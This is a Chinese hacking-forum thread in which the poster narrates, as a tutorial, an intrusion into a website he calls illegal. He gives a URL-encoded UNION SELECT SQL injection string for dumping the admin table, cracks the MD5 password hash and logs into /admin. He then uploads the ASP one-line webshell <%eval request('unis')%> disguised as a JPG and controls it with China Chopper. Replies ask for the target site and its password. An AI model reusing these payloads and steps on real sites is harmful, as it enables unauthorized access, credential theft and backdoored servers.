白帽渗透吧 关注:78贴子:155

渗透一次非法网的超详细过程【图文详解】

只看楼主收藏回复

简单粗暴


IP属地:福建1楼2014-04-05 09:51回复
    那我用手工来注入出来。在该页面输入语句:
    %20Un ion%20s elect%201,2,3,4,5,6,7,8,9,10,11,12,13%20from%20admin


    IP属地:福建5楼2014-04-05 09:55
    回复
      得到管理员账号密码的字段位置。


      IP属地:福建6楼2014-04-05 09:56
      回复
        因为前面使用啊D已经知道了字段的名称。直接带入进去。将2的地方带入为admin,8的地方带入为password。得到管理员账号密码:


        IP属地:福建7楼2014-04-05 09:57
        回复
          是一个32位的MD5值拿去解密,成功解密得到密码


          IP属地:福建8楼2014-04-05 09:58
          回复
            还没找后台,于是在网站后面试试加个/admin,果真是后台,直接进去了


            IP属地:福建9楼2014-04-05 10:02
            回复
              保存后打开了,漏洞上没说明传说明文件,传asp的没有得到源地址。于是我将asp马改成jpg的,成功在源代码中得到地址。


              IP属地:福建11楼2014-04-05 10:05
              回复
                上小马~结果提示解析错误,貌似是小马代码不行~干脆直接上一句话木马。将
                <%eval request(“unis”)%>
                写入图片。通过exp直接上传。


                IP属地:福建12楼2014-04-05 10:06
                回复
                  成功传上去,查看源代码得到一句话木马地址,用中国菜刀连~成功连上去了


                  IP属地:福建13楼2014-04-05 10:08
                  回复
                    然后教程结束 该上大马上大马


                    IP属地:福建14楼2014-04-05 10:18
                    收起回复
                      楼主,网站拿出来,我去看看


                      IP属地:重庆16楼2014-08-16 09:47
                      回复
                        还有后台密码交出来


                        IP属地:重庆17楼2014-08-16 09:54
                        回复
                          楼主真是大神啊 小白谦虚的路过~~~~~~~~


                          来自Android客户端20楼2015-01-19 23:38
                          回复
                            楼主用的什么工具


                            来自iPhone客户端21楼2015-01-23 11:25
                            回复